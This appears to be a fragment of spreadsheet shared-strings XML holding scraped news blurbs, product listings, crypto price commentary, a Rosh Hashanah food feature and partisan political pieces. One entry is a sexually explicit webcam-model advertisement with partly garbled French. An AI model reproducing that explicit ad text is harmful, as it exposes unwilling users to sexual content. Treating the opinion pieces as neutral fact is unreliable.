    <t>Government urged to step in over crisis that has cost tens of thousands of jobsRetailers and unions are calling for urgent government action to help struggling high streets as new data shows the number of shops, pubs and restaurants lying empty is rising at the fastest pace in nearly a decade.About 16 stores closed their doors every day in the first half of 2019 while only nine opened, resulting in a net decline of 1,234 chain stores on Britain’s top 500 high streets according to analysis by PricewaterhouseCoopers (PwC) and high street analysts the Local Data Company (LDC). Continue reading… Read More</t>
  </si>
  <si>
    <t>CanDealOnline</t>
  </si>
  <si>
    <t>🌾 BETTER DAILY CHOICE using Grass Straws is just as convenient as single-use plastic straws, but it has only a positive impact on the environment. 🌾THE GRASSY ALTERNATIVE? Our Grass straws originate in nature and end up in nature, making them truly 100% biodegradable! Not only beautiful, but our straws are also organic, strong and durable, contain NO inks or dyes. Your purchase makes a difference to the Mekong Delta Region, protect the species and traditional industry. 🌾SAFE DRINKING doesn't transfer heat like Glass and stainless steel straws do, making them ideal for hot drinks, as well as a great choice for children who want to enjoy their favourite drinks without the risk of breakage, making them ideal for all drink types from your green juice or smoothie to coffee and cocktails. No pesticides or chemicals are used while growing or drying. 🌾EASY DISPOSE: You can use our Straws up to 3 times after rinsing them with fresh water, finally just dispose of in your organic bin or compost. Fantastic for private use as well as commercial food trucks, restaurant, bars clubs and many more 🌾BIO-DEGRADABLE Each pack contains 50 Grass Straws which might differ from one another as it is a 100% natural product.</t>
  </si>
  <si>
    <t>Clear</t>
  </si>
  <si>
    <t>After popular request Romoss have brought in more stock of this 30000mAh power bank. They also have 2 other standard charging power banks on sale. The Sense 8+ has multiple fast charging technologies including 18W USB-PD via USB-C, Quick Charge 3.0 via the blue USB port and 5V/2.1A via the white USB port. For recharging it has USB-PD via USB-C, QC 3.0 via Micro USB and and 5V/2.1A via Lightning. Other fast charging technologies supported include Huawei FCP, Samsung AFC, QC2.0, MTK PE and Apple 2.4A. It also supports pass-through charging. The OM10 is a standard charging power bank with Micro USB, Type-C and Lightning input and dual USB output. While the Sense 6 has Micro USB input and dual USB output. Romoss Sense 8+ 30000mAh Power Bank for $39.99 with coupon sense20off Romoss OM10 10000mAh Power Bank for $17.59 with coupon sense20off Romoss Sense 6 20000mAh Power Bank for $23.99 with coupon sense20off AU stock, AU warranty, free shipping with Prime (or orders over $39) and stackable with your favourite cashback provider! Sense 8+ Specifications Capacity: 30000mAh / 111Wh Type-C Output: 5V/3A, 9V/2A, 12V/1.5A (18W USB-PD) Blue USB Output: 5V/3A, 9V/2A, 12V/1.5A (QC3.0/Samsung AFC/Huawei FCP/MTK PE) White USB Output: 5V/2.1A Type-C Input: 5V/2A, 9V/2A Micro USB Input: 5V/2A, 9V/2A Lightning Input: 5V/2.1A Dimensions: ~L167 x W80 x H32.8mm Weight: ~671g Q&amp;A Is the 30000mAh allowed to be taken on planes since it's over 100Wh? Yes with airline permission as it's under 160Wh: Qantas - email approval Jetstar - email approval Virgin - declare at check in TSA - airline approval</t>
  </si>
  <si>
    <t>Source: https://www.cnet.com/news/best-facial-recognition-cameras-for-2019/#ftag=CAD590a51e The best facial recognition cameras of 2019 – CNET More and more home security cameras have facial recognition. Here are your best options. Source: https://www.cnet.com/news/best-facial-recognition-cameras-for-2019/#ftag=CAD590a51e The post The best facial recognition cameras of 2019 – CNET appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>businesstelegraph</t>
  </si>
  <si>
    <t>For Bitcoin exchange-traded funds (ETFs), it’s just another day and another delay as the Securities and Exchange Commission (SEC) initiated proceedings regarding the Wilshire Phoenix Bitcoin (BTC) exchange-traded fund (ETF) proposal earlier this week. As cryptocurrency supporters within the capital markets await a decision on a crypto-related ETF, the space is still moving forward with innovation. The price of Bitcoin has now fallen below $10,000 after it saw a run-up from positive news regarding social media giant Facebook’s offering of its cryptocurrency project, dubbed “libra.” Since then, however, Bitcoin has stumbled, particularly with the latest news on the lack of an ETF hitting the market with SEC approval. Despite the lack of a Bitcoin or crypto-related ETF, the digital asset space is still evolving. For example, Zero Hash, the complete digital asset and fiat currency settlement service, today announced that the electronic digital asset trading platform Artificial Intelligence Exchange, or AiX, has agreed to use Zero Hash to settle its OTC trades. Zero Hash, which in March launched a suite of over-the-counter (OTC) trade settlement services for digital assets, and recently announced support for forwards, is a BitLicense holder, a FinCEN-regulated Money Service Business, as well as a Money Transmitter in over 30 states. AiX is the world’s first natural language AI broker, automating peer-to-peer trading of financial assets anonymously. Launching first digital assets, clients of AiX will eventually be able to source liquidity and execute in any tradable asset. By automating the broker function, AiX is able to drastically reduce trading costs for counterparties whilst simultaneously providing a superior service. “We are very pleased to be working with AiX, to allow their clients to settle digital asset and fiat trades,” said Edward Woodford, Seed CX co-founder and CEO of Zero Hash. “Zero Hash has been designed from the ground up to settle trades for OTC trading platforms and their clients by offering complete flexibility in a secure and regulated ecosystem.” “Crypto markets are evolving quickly, but still screaming out for efficient price discovery and execution. Through its partnership with Zero Hash, AiX will provide crypto market participants with the ability to source liquidity instantly from around the world, and settle automatically, all for a fraction of the costs that they are currently paying. We are very excited to be launching this combined product with Zero Hash,” said Jos Evans, Founder and CEO of AiX. For more market trends, visit ETF Trends. READ SOURCE The post Crypto Markets Evolving Despite Lack of a Bitcoin ETF – ETF Trends appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>A CLOSURE order has been granted for a property in Bridgwater following residents’ concerns over the supply and use of illegal drugs. Read more? Click here</t>
  </si>
  <si>
    <t>Melbournian</t>
  </si>
  <si>
    <t>The item is discounted by 50% once added to cart. The David Jones Wellness Edit includes 5 full sized products &amp; 8 Deluxe samples from some of our favourite Wellness brands. The collection of samples is stored in a practical, neoprene cosmetic case which is perfect for your gym bag. $49.95 Valued at over $200* -Neal's Yard Remedies Wild Rose Beauty Balm -Weleda Sea Buckthorn Hand Cream -BUTT NAKED Body Scrub -IN ESSENCE ie Breath Balm -Karen Murrell Moisture Stick Lip Balm -WelleCo The Super Elixir Green supplement -Christophe Robin Cleansing Volumising Paste -Dr. Bronner's 18-IN-1 hemp lavender pure-castile soap -Lanolips Rose Hand Cream -VITA LIBERATA body blur -The Beauty Chef COLLAGEN Inner Beauty Boost -BEAR Essential Daily Vitamins -Antipodes Manuka Honey Skin-Brightening Day Cream *Total value of gift bag and contents based on suppliers recommended retail price. While stocks last Style Number: 22422691</t>
  </si>
  <si>
    <t>Dani Valent</t>
  </si>
  <si>
    <t>A morning jog is not mere exercise. It’s connecting, sleuthing, holding mundane tasks at bay – and sometimes, a near-death experience.</t>
  </si>
  <si>
    <t>Josh Barrie</t>
  </si>
  <si>
    <t>A family have been left temporarily homeless after their house fell down just hours after builders had been working on the property next door. The terraced house, in Rugby, Warwickshire, partly collapsed early on Wednesday morning, leaving two rooms entirely exposed and debris all over the street. Emergency services were called at around 2am. The family, including children, were fortunately away at the time and nobody was injured. They have now been placed in a hotel while a new home is found. Two of the children’s bedrooms and the kitchen were destroyed as a result of the collapse and their possessions were left strewn across the road. ‘Like a bomb had gone off’ Their belongings were scattered across the road (Photo: SWNS) Residents said it “sounded like a bomb going off”. Neighbour Laura Evans, 33, said: “I just heard this almighty bang, like a bomb going off and could see dust rising into the air. It was pretty scary.” Warwickshire Fire and Rescue Service and Warwickshire Police attended the scene to secure the area and put road closures in place. Structural engineers also attended to examine the property after Rugby Borough Council launched an investigation. One family member, who did not wish to be named, said: “It was a shocking experience and no one is accepting liability. “Our landlord is confused what is covered by his building insurance and the contractor doesn’t want to accept liability.” A fundraising page has been launched for the family by a friend. They wrote: “The children only have their uniforms and school bag with them. In shock Builders had been working nearby (Photo: SWNS) “Imagine their shock coming from home from school seeing their house in ruins. They are renting and do not have content insurance, not many people who rent think of this. “Araial and Mel are close friends and have at some point they have helped us when we are in need. I always say that one of their greatest traits is to make everyone they come across feel that they are friends and family. I personally know them for half of my life and consider them as my extended family. Knowing them, I am certain their faith in our God will see them through this crisis in their lives. “Let us rally support for them and their family at a time of their greatest need. God bless you all and thank you for your generosity.” A spokesman for Rugby Borough Council said: “Officers from Warwick Building Control arrived on site at a property in Claremont Road at around 7pm yesterday (Tuesday) after receiving a report a two-storey extension on a terraced property had collapsed. “Warwickshire Fire and Rescue Service, and Warwickshire Police attended the scene. The area was secured and a partial road closure put in place. Investigation “At 2am this morning, the gable end of the property collapsed. The property was empty throughout and nobody was injured. “Officers from Warwick Building Control have launched an investigation into the cause of the collapse and have a site meeting with a structural engineer this morning to assess the property.” A spokesperson for Warwickshire County Council said: “We can confirm that the only road closure currently in place is that of Claremont Road, between the junction of Wells Street and Tom Brown Street.” “At this time we are unable to confirm the length of the closure. We will however be liaising with building control officers until such time the property is deemed safe. In addition to the above, we are also arranging additional Traffic Management including heras fencing to improve the cordon around the collapse.” A spokesperson for Warwickshire Police spokesperson confirmed they attended the scene but added: “We don’t believe there was anything suspicious about the incident.” More property Help to Buy ISA scheme: how long you have to open an account as the deadline looms 'We took out a mortgage until we're 105 – to help our son buy a flat' Should I pay off my equity release loan with my inheritance? Bank of mum and dad now 'equivalent to top UK mortgage lender' Solving the housing crisis isn't as simple as building 300,000 homes This 13ft wide house is going to be auctioned off for £150,000 The post A family have been left temporarily homeless after their house collapsed in the middle of the night appeared first on inews.co.uk. The post A family have been left temporarily homeless after their house collapsed in the middle of the night appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>My Kinks: I am an open-minded boy always willing to make you Webcam profile: Hey bro. training hard and blowing my muscles is a hobby for me, I end up tired, sweaty, excited and wanting to fuck a good ass. Put yours before me and you will feel breathing behind you and I will leave you smelling real man. Something like a mixture of semen and sweat. Do u want Favourite sex position: J’aime beaucoup les posiciones préférées de votre chiot missionnaire de haut en bas et beaucoup d’autres me disent ce qui se passe. What I do in my amateur show: I like to Workout, take care of my body, always be in good shape for my members. My image is very important, but my attitude is hot and morbid. What I don’t like: I am open to any possibility I am a man of challenges and I like to live new experiences Gallery</t>
  </si>
  <si>
    <t>mobileszone</t>
  </si>
  <si>
    <t>We review products independently, but we may earn affiliate commissions from buying links on this page. Terms of use. Qualcomm powers all the 5G devices in the US right now, but this first round has been disappointing; the current crop of 5G phones are expensive, have poor coverage, and overheat easily. Today at IFA, Qualcomm told us to cheer up: there’s more and better 5G coming. A lot of the announcement was hazy, because Qualcomm is teasing out the details through the end of the year. The chipmaker has a big 5G event in late September, followed by its annual conference in December, at which we expect to see the game changer—the Snapdragon 865 chipset with integrated 5G. But for now, the tease. Qualcomm emphasized that we’ll see phones with 700-series integrated 5G chipsets in early 2020 and 600-series ones in late 2020. The 700 series chips are popular in China, so that’s a signal about lots of Chinese 5G phones coming. Interestingly, Qualcomm said 700-series 5G devices will come out in North America as well, and called out Motorola and LG as potential providers. The 600 series is Qualcomm’s reasonably priced midrange, so that’s a signal about 5G device prices coming down next year. We’ll hear more about that in a few weeks, but for now, Qualcomm also had an antenna announcement that could change the picture of 5G in the US. The most important announcement for US users, I think, is the QTM527 millimeter-wave antenna module for home internet connections. According to Qualcomm, the QTM527 will enable 5G providers to offer home internet service a mile from a 5G connection point in rural areas, and 0.7 miles away in urban areas. The new antenna can also pick up signals reflected off windows and walls, meaning it can work around corners. This thing isn’t designed to fit into smartphones—it’s for boxes that replace home and office cable connections. But the promised 3,600-foot usable urban distance is six times what I’m seeing with current mmWave smartphones on Verizon, AT&amp;T, or T-Mobile. I’ve been let down enough by 5G mmWave range promises at this point that I simply can’t believe what Qualcomm is promising. But if they extend the range that far, it’ll work with radios placed a mile apart in suburban areas, which completely changes the “radio on every lamppost” debate many US towns are having over mmWave 5G. The QTM527 will appear in home internet equipment in early 2020, Qualcomm says. Verizon has promised 5G-based home internet systems in late 2019, but they’ll be based on earlier hardware that won’t get this kind of range. Source link</t>
  </si>
  <si>
    <t>APPLE launched its hugely-important iOS 13.1 update to iPhone and iPod Touch owners last night. The software upgrade, which was brought forward six days from its original scheduled launch date, is designed to fix a number of issues flagged by iOS 13 users, including one crucial security flaw that allowed people to bypass the lock screen to access your Contacts. But Apple has warned iOS 13.1 is not without its issues either… Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>BMX TRIP IN BARCELONA@hugo_2806 The post BMX TRIP IN BARCELONA@hugo_2806 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>It happens? by Stephen Tailby 11 minutes ago Outer Wilds is a title that seems to have made a strong impression this year. The game – not to be confused with the Obsidian science-fiction role-playing game, The Outer Worlds – enjoys an excellent reputation, both among critics and players alike. Currently only available on Xbox One and PC, this is a space adventure game with an intriguing mystery. But does he come to PlayStation 4? According to the Korean evaluation board, this is the case. As discovered by Gematsu, a note was filed for Outer Wilds yesterday. Although no platform appears next to the title, the candidate for the classification was Sony Interactive Entertainment Korea. The initials appear on the classification number. This sort of thing is almost always legitimate, so we would bet that Outer Wilds will soon be linked to the PS4. In fact, we have the impression that this could be announced during the state of play next week. What do you think? Do you want Outer Wilds on PS4? Take a giant leap in the comments below. [via grac.or.kr, gematsu.com] Related Games .</t>
  </si>
  <si>
    <t>SAFFRON BARKER, 19, has made a huge sum of money from social media accounts on Instagram and Youtube. Look inside her house, a property purchased with her £1 million fortune. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>It is part of efforts to reach a 2050 net zero carbon emissions target.</t>
  </si>
  <si>
    <t>Steven Rae</t>
  </si>
  <si>
    <t>The teenager who abducted, raped and murdered a six-year-old girl on the Isle of Bute has had his minimum sentence reduced by three years following an appeal in Edinburgh.</t>
  </si>
  <si>
    <t>ETH price broke the main $185 resistance and climbed above $190 against the US Dollar. Bitcoin price is consolidating above the $10,300 support area, with positive signs. There is a connecting bullish trend line forming with support near $188 on the hourly chart of ETH/USD (data feed via Kraken). The pair is likely to continue higher and it might soon test the $200 resistance area in the near term. Ethereum price is climbing above $190 versus the US Dollar and recovering vs bitcoin. ETH price is showing positive signs and it might continue to rise towards $200-$205. Ethereum Price Analysis In the past analysis, we discussed the chances of an upside break in ETH price above the $185 resistance against the US Dollar. The price did gain traction and broke the main $185 and $186 resistance levels. Moreover, there was a close above $185 and the 100 hourly simple moving average. It opened the doors for more gains above the $190 level. On the other hand, bitcoin price remained in a range above the $10,300 level. Ethereum price even broke the $192 level and traded to a new weekly high at $195. The current price action indicates more gains above the $195 level. If there is a downside correction, an initial support is near the $193 level. It coincides with the 23.6% Fib retracement level of the recent upward move from the $187 swing low to $195 high. However, the main support on the downside is near the $190 level. It represents the 50% Fib retracement level of the recent upward move from the $187 swing low to $195 high. Additionally, there is a connecting bullish trend line forming with support near $188 on the hourly chart of ETH/USD. Therefore, if there is a downside correction, the price is likely to find buyers near $190 or $188. On the upside, a convincing break above the $195 level could open the doors for a push towards the $200 resistance level. However, the main resistance is near the $205 level (the previous support), above which the price could surge towards $220. Looking at the chart, Ethereum price is trading with a strong bullish bias above the $190 level. If the price remains above the $190 level for a couple of sessions, there are high chances of a run towards the $200 and $205 levels. If not, the price may perhaps extend the correction towards $188 or $185. ETH Technical Indicators Hourly MACD – The MACD for ETH/USD is currently gaining momentum in the bullish zone. Hourly RSI – The RSI for ETH/USD is currently climbing higher and it is well above the 70 level. Major Support Level – $190 Major Resistance Level – $195</t>
  </si>
  <si>
    <t>Kylie Northover</t>
  </si>
  <si>
    <t>The NGV is expecting a broad visitor base with its first-ever exhibition of artist Brian Donnelly, better known as pop culture phenomenon KAWS.</t>
  </si>
  <si>
    <t>Australians are busier than ever but many are struggling to keep a roof over their heads and an alarming 25 per cent say they suffer from loneliness, according to a national report out today.</t>
  </si>
  <si>
    <t>Melissa Singer</t>
  </si>
  <si>
    <t>'The European woman really gravitates to our collection.'</t>
  </si>
  <si>
    <t>Chet Porter - The Longest Day Ever Chet Porter - The Longest Day Ever by Ultra Music https://ffm.to/tlde The Latest &amp; Greatest from Ultra Music http://smarturl.it/UltraLatestGreatest Follow Chet Porter https://www.Instagram.com/chetporter https://www.Twitter.com/chet porter https://www.facebook.com/chtprtr/ Follow Us: https://www.youtube.com/user/UltraRecords/?sub_confirmation=1 https://www.ultramusic.com Tweets by ultrarecords https://www.facebook.com/ultramusic https://www.youtube.com/ultratv https://instagram.com/ultrarecords https://open.spotify.com/user/ultramusicofficial The post Chet Porter – The Longest Day Ever (Visualizer Video) [Ultra Music] appeared first on Dubster.</t>
  </si>
  <si>
    <t>Dozens of customers say they paid Hayley King for holidays that never materialised. Read more? Click here</t>
  </si>
  <si>
    <t>JEREMY CORBYN and his Labour Party’s “economically disastrous” plans to renationalise some of Britain’s biggest industry sectors would raid eight million individual pension pots invested in the infrastructure sector and see customers’ bills surge, furious critics have told Express.co.uk. Daily Express :: News Feed Labour nationalisation fury: How Corbyn’s ‘rip off’ plan will raid YOUR pension pot</t>
  </si>
  <si>
    <t>PM Benjamin Netanyahu fights for a fifth term after failing to form a coalition during the summer. The post Israelis vote in second general election in five months appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Chicago rockers Jered Gummere (the Ponys), Alex White (White Mystery), Nobunny &amp; Chris DeArcangelis (Mama) share their favorite record stores, hot dogs, bars &amp; more. Travel details &amp; map at https://jetlagrnr.com/destinations/chicago. + Subscribe for the latest guides! + Add us on Instagram: @jetlagrnr +++ SEGMENT BREAKDOWN Do 3:25 Eat 6:40 Shop 9:41 Rock 14:55 Drink […] The post JetLag RocknRoll: Chicago Travel Guide appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Felicity Turner</t>
  </si>
  <si>
    <t>The festival of Rosh Hashanah, the Jewish New Year, is a joyous occasion celebrated by members of the religious community all over the world. The festival consists of many elements, including prayer services in synagogues and the blowing of an ancient musical horn called a “shofar“, which is made from a ram’s horn. However, one of the most anticipated aspects of Rosh Hashanah is undeniably all of the delicious, sweet foods that Jewish people eat throughout the festival, which starts this year on the evening of Sunday 29 September and ends on Tuesday 1 October. We’ll tell you what’s true. You can form your own view. From 15p €0.18 $0.18 USD 0.27 a day, more exclusives, analysis and extras. Subscribe now During Rosh Hashanah, Jewish people will frequently say the Hebrew phrases: “Shana Tova” or “Shana Tova U’Metukah” to one another, meaning: “A good year” or “A good and sweet year.” The sweet foods that are eaten during Rosh Hashanah are therefore meant to symbolise the hope for a sweet and happy year ahead. Read more One of the most recognisable food staples that adorns the dinner table during Rosh Hashanah is apple and honey, a traditional combination that has passed down the generations for centuries. This is accompanied by a song that is taught to young children at cheder (Jewish Sunday school), which goes: “Dip the apple in the honey, make a bracha [blessing] loud and clear. L’Shana Tova U’Metuka, have a happy sweet New Year.” In addition to dipping the apple in the honey, Jewish people also frequently eat honey cake, pomegranates and round raisin loaves of challah to see in the New Year. Read all about the foods that are traditionally served during Rosh Hashanah, from honey cake to a fish’s head: Apple and honey Apple and honey (Getty Images/iStockphoto) The dipping of the apple in the honey is one of the most recognisable traditions associated with Rosh Hashanah. The honey symbolises the excitement for a sweet New Year ahead. It’s believed that centuries ago, the apple was chosen as the fruit that was to be dipped into the honey on Rosh Hashanah due to the symbolic nature of the fruit. According to a Lexicon of Jewish Cooking, written by Patti Shosteck, in medieval times apples were so revered that people would carve prayers into the apple skins before eating them. Pomegranate Pomegranate (Getty Images) The pomegranate is also a highly symbolic fruit eaten by the Jewish people during the New Year. The Torah, the Jewish scroll that contains the first five books of the Tanakh, consists of 613 “mitzvot”, or commandments. The Jewish Museum in New York City states that a pomegranate supposedly consists of 613 seeds, which is why it is eaten during Rosh Hashanah. On top of that, it’s also a sweet fruit, which is why it ties in nicely with the festival. Jewish people also eat many other types of fruits during Rosh Hashanah, including dates, lychees and star fruits. Round raisin challah Round challah (Getty Images/iStockphoto) Challah is a special Jewish bread that is frequently eaten on Shabbat and during religious festivals. Usually challah loaves are plaited and adorned with different types of seeds, such as sesame or poppy seeds. However, when Rosh Hashanah comes around, round raisin challahs become especially popular as opposed to long, plaited variations. Project Genesis, a Jewish education organisation, recommends substituting the raisins for dried cranberries or sour cherries as an alternative to the raisin loaf. Kiddush wine Kiddush wine (Getty Images/iStockphoto) A Jewish celebration isn’t complete without an abundance of kiddush wine to mark the occasion. A “kiddush” is a type of blessing recited over wine or grape juice during Shabbat or other Jewish festivals. Kiddush wine is typically much sweeter than other types of wine. It’s explained on the Chabad website that during periods of time when Jewish communities were impoverished, many couldn’t afford to buy expensive wine for Shabbat. Therefore, they would often have to resort to buying cheap, sweet wine that was sometimes made from raisins instead. Honey cake Honey cake (Getty Images/iStockphoto) It should come as no surprise that honey cake is eaten during Rosh Hashanah, what with the festival’s focus on sweet food. Many Jewish people who make honey cake to celebrate the New Year will make batches that they will then give to friends and family to spread love and happiness during the festive occasion. The cake’s ingredients often include cinnamon, ginger and – of course – honey or syrup. Fish head Fish’s head (Getty Images/iStockphoto) It’s customary for some Jewish people to eat the head of a fish during Rosh Hashanah. Why, you may ask? The reasoning stems from the literal translation of the festival’s name. Support free-thinking journalism and attend Independent events “Since ‘Rosh Hashanah’ translates literally as ‘Head of the Year,’ eating a fish head on the holiday became a little joke about the verse,” explained Jeremy Kalmanofsky, rabbi of New York City’s Conservative Ansche Chesed. “You should start your year as the head [or leader] and not the tail [or follower].” The post Rosh Hashanah 2019: The symbolic foods that are eaten during the Jewish New Year appeared first on East London Observer.</t>
  </si>
  <si>
    <t>Sky News Host Paul Murray says left wing journalists in the United States are still trying to pretend that “Vladimir Putin stole votes in Pennsylvania” without any evidence it happened. Mr Murray joined The Daily Caller senior journalist Henry Caller in Washington last night where they discussed the latest conspiracy theories being levelled against President Donald Trump and analysed the upcoming US election. “They are saying that Vladimir Putin Stole votes in Pennsylvania, that he rigged voting machines in Ohio and somehow he tricked little old ladies in Forida,” Mr Murray Said. “It didn’t happen.” Mr Caller said the Mueller Report – which probed allegations the Trump Campaign colluded with Russia – spent $40 million to then exonerate President Trump of the original claim. “The Mueller Report spent $40 million looking into the same subject and they found absolutely nothing,” he said. “It is a scam, it is a complete scam and I feel so bad for everybody who’s been dragged up into this.”</t>
  </si>
  <si>
    <t>Guy Walker</t>
  </si>
  <si>
    <t>Official Report on the Ghoulish Criminal Pathology of the Dead Parliament 1 The subject (The ‘Dead’ Parliament) identified a suitable victim on the basis of his being in possession of the celebrated human attributes of personhood, moral agency and free will that enabled him to express unrepentant Englishness and a desire for Brexit. Seeing his exercise of these faculties as inconveniences and an offence against what it considered to be normality, it set out to neutralise them with extreme prejudice. The form this took can only be described as an attempt to ‘possess’ him and his ‘executive’ entourage, and to turn him and them into a version of the Walking Dead and, thus, to share in its own moribund, ‘zombie’ nature and increase the number of the dead. The first target was the victim’s linguistic faculty. His control over what he writes was appropriated remotely in order to make him write a letter he did not wish to write. This has been categorised as a new form of automatic writing. Next, his speech was targeted. Anything offending against a Remain agenda was proscribed and deemed inflammatory. An incontestable and verifiable causal link between it and the inevitability that a series of murders would be carried out in the country was ‘proved’. The customary use of metaphor was banned and substituted with a literalism that excised any possibility of irony or wit. For example a boxing metaphor, such as ‘throwing in the towel’, was seen as a direct incitement to violence (it should, however, be noted that ‘going off a cliff edge’ was not deemed to be distressing for those who might be contemplating suicide). In this way limits were set on what the victim was allowed to say. We can only conclude that the aim was to erase his normal faculties and turn him into a mute and obedient vacuum enclosed by a human shell into which anything at all might be inserted, or a neutered marionette whose strings are twitched by the majority in the legislature. 2 The result of the above, to use a technical term, ‘depersonalisation’ and immobilisation is that the legislature, instead of being the theatre for principled debate, now resembles the avant-garde set for an unedifying Theatre of Cruelty production or Buffalo Bill’s basement in The Silence of the Lambs. Discovering that its obstructive actions have delivered a helpless Conservative Party into its hands, the Chamber of the House of Commons has mutated into a torture chamber where free rein is given for long-held hatreds, spites and resentments to be unleashed to punish the crime of being Tory. Punishment beatings are administered as Tories are turned into moral pariahs whom it is legitimate to beat. The method may be open vilification or it may be the dumb hatred of a passive aggression that, by refusing an election, inflicts and sustains the state of paralysis on the government. As a result, that government now resembles the blood-drained brides of Dracula kept on tap or the living human victims of the Alien monster stashed in a sticky larder for later consumption. Given this open goal, the opposition parties find it hard to resist the opportunity and the media join in gleefully with the choreography. 3 In terms of psychiatric pathology, various theories have been advanced to explain the subject’s general behaviour. Having invited and then received an instruction from the people, there have been various responses to that instruction. The ‘Liberal Democrat’ wing has shown naked hostility to the instruction. In 2011 a new psychiatric disorder was described, now known as ‘Pathological Demand Avoidance Syndrome’, The name speaks for itself. Our medical officers are seriously considering that this may be a suitable diagnosis for the Liberal Democrats. In the case of the wing known as the ‘Labour Party’, the medical officers are entertaining the theory that it is suffering from a personality disorder of the passive-aggressive type cited already above. It has exhibited a perennial hostility to the Conservative Party but is unable to bring itself to express this hostility honestly and openly. Instead it engages in a series of blocking and obstructing tactics designed to necrose politics entirely. The refusal to call the election it says that it wants indicates a nature terminally at odds with itself. It is noted that its members enact being at odds with itself in the most vivid manner in person. 4 Some of the behaviours exhibited by the opposition parties are of considerable clinical interest as they have emerged only in recent times. A working theory is that the televising of Parliament has resulted in an effect known as ‘The Society of the Spectacle’ with a related condition tentatively classified as Narcissismus legacismus, whereby sufferers are seen to grandstand outrageously with one eye on the cameras and the other on the history books. The most severe case that has presented itself to date is that of the Speaker of the House. Several female Labour MPs notable for their shameless histrionics have also been recorded in this connection. A tactic they commonly employ is to assume victimhood while being equally guilty of the sins of which they accuse others. For these patients an image, projected principally in their mind’s eye, of themselves in the role of hero shaking their fist uncompromisingly at an imagined oppressor supersedes the more pedestrian reality around them. In 35 years of experience I and my officers have seldom encountered psycho-pathologies like those described in this report, and several of my team have experienced severe emotional trauma as a result. Sgd Inspector Jonathan Harker The post House of the Living Dead appeared first on The Conservative Woman. The post House of the Living Dead appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Ted Laturnus</t>
  </si>
  <si>
    <t>If you’re moving from a studio or one-bedroom apartment, a full-size pickup or a mini-van with the seats taken out and some trustworthy friends and cold refreshments will do. But it’ll take more than one load to do it. However, a small cargo van is more comfortable, tends to offer better fuel economy and you can get a fair amount of stuff into one if you use your head On the fun scale, moving is right up there with looking for a job, root canal and shovelling snow off the driveway. And it’s made even worse if you don’t have the right vehicle (not to mention friends who have suddenly all left town). Borrowing your buddy’s hatchback and cramming it full of your stuff for endless trips across the city gets old in a hurry. The whole ordeal can be made that much easier by just biting the bullet and getting a decent-sized van from the get-go. Depending on how far you have to go, sometimes buying a van outright and then selling it when you’re done can be cheaper than renting one or paying someone else to do the job. But what to choose? If you’re moving from one studio to another, for example, you don’t really need a five-ton truck, while the contents of a two-bedroom apartment will require more than a mini-van with the seats removed. Either way, here are some suggestions, broken down by size. One-bedroom apartment or studio OK, you can probably get by with a full-size pickup or a mini-van with the seats taken out and some trustworthy friends and cold refreshments. But it’ll take more than one load to do it. The advantages to using a pickup are that it’ll take tall and odd-shaped loads. On the other hand, it’ll be open to the elements and everything will have to be tied down. Most rental companies have a fleet of single cab/long-bed pickups available (usually Ford F-150s) and this is one of your most affordable options. That said, a small van is more comfortable, tends to offer better fuel economy and you can get a fair amount of stuff into one if you use your head. A Dodge Ram cargo van, for example, has 144 cubic feet of space, which will take a big bite out of most studio apartments. Other choices include the Nissan NV200 Compact Cargo (122 cubic feet), Chevrolet City Express, Ford Transit long wheelbase (130 cubic feet), the short-wheelbase Mercedes-Benz Sprinter (371 cubic feet), and the GMC Savana/Chevrolet Express (239 cubic feet). Of these six, the Sprinter is probably the most versatile. It’ll accommodate the most stuff and is powered by a thrifty turbodiesel engine. The disadvantage is that these are hard to find and not utilized by many rental companies. Two- or three-bedroom apartment You’re moving up in the world now and you pretty much have to think about a cube van or Mercedes long-wheelbase Sprinter. This latter vehicle has an astonishing 600 cubic feet of cargo room with the high roof model and you can empty most two- or three-bedroom apartments into it if you’re careful. The extended wheelbase versions of the GMC/Chev duo might also do in a pinch here, as will the Ford E-series wagon, which feature some 300 cubic feet of cargo room. A couple of other pluses with the Mercedes, Ford, and GM products: they have side access doors and are comparatively easy to manoeuvre in city traffic. Three- or four-bedroom house Now you’re playing with the big boys and you will have to rent a full-size truck. Depending upon the model, these will handle up to 1,000 cubic feet of cargo and you should be able to do everything in one shot. They usually have a rear loading ramp and some come with a hydraulic rear liftgate for the heavy stuff. Virtually all the rental companies stock these in abundance and they usually have a diesel engine of one type of another. On the other hand, they’re not the easiest rigs to manhandle around town, take up a lot of room during loading/unloading, and may require a special licence to operate. All things considered, multiple trips with one of the smaller rigs mentioned above may be the best option here. If all this is too much and you just can’t be bothered, you can always hire someone to do everything for you. The two-men-with-a-truck scenario can run from about $500 a day, and well-known moving outfits can go as high as $10,000 to accommodate a full home and everything that comes with it. If you have a three- or four-bedroom home, you’ll need to rent a full-size truck. Depending upon the model, these will handle up to 1,000 cubic feet of cargo and you should be able to do everything in one shot. They usually have a rear loading ramp and some come with a hydraulic rear liftgate for the heavy stuff Ted Laturnus writes for Troy Media’s Driver Seat Associate website. An automotive journalist since 1976, he has been named Canadian Automotive Journalist of the Year twice and is past-president of the Automotive Journalists Association of Canada (AJAC). © Driver Seat The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Moving? Here are some practical vehicle options appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
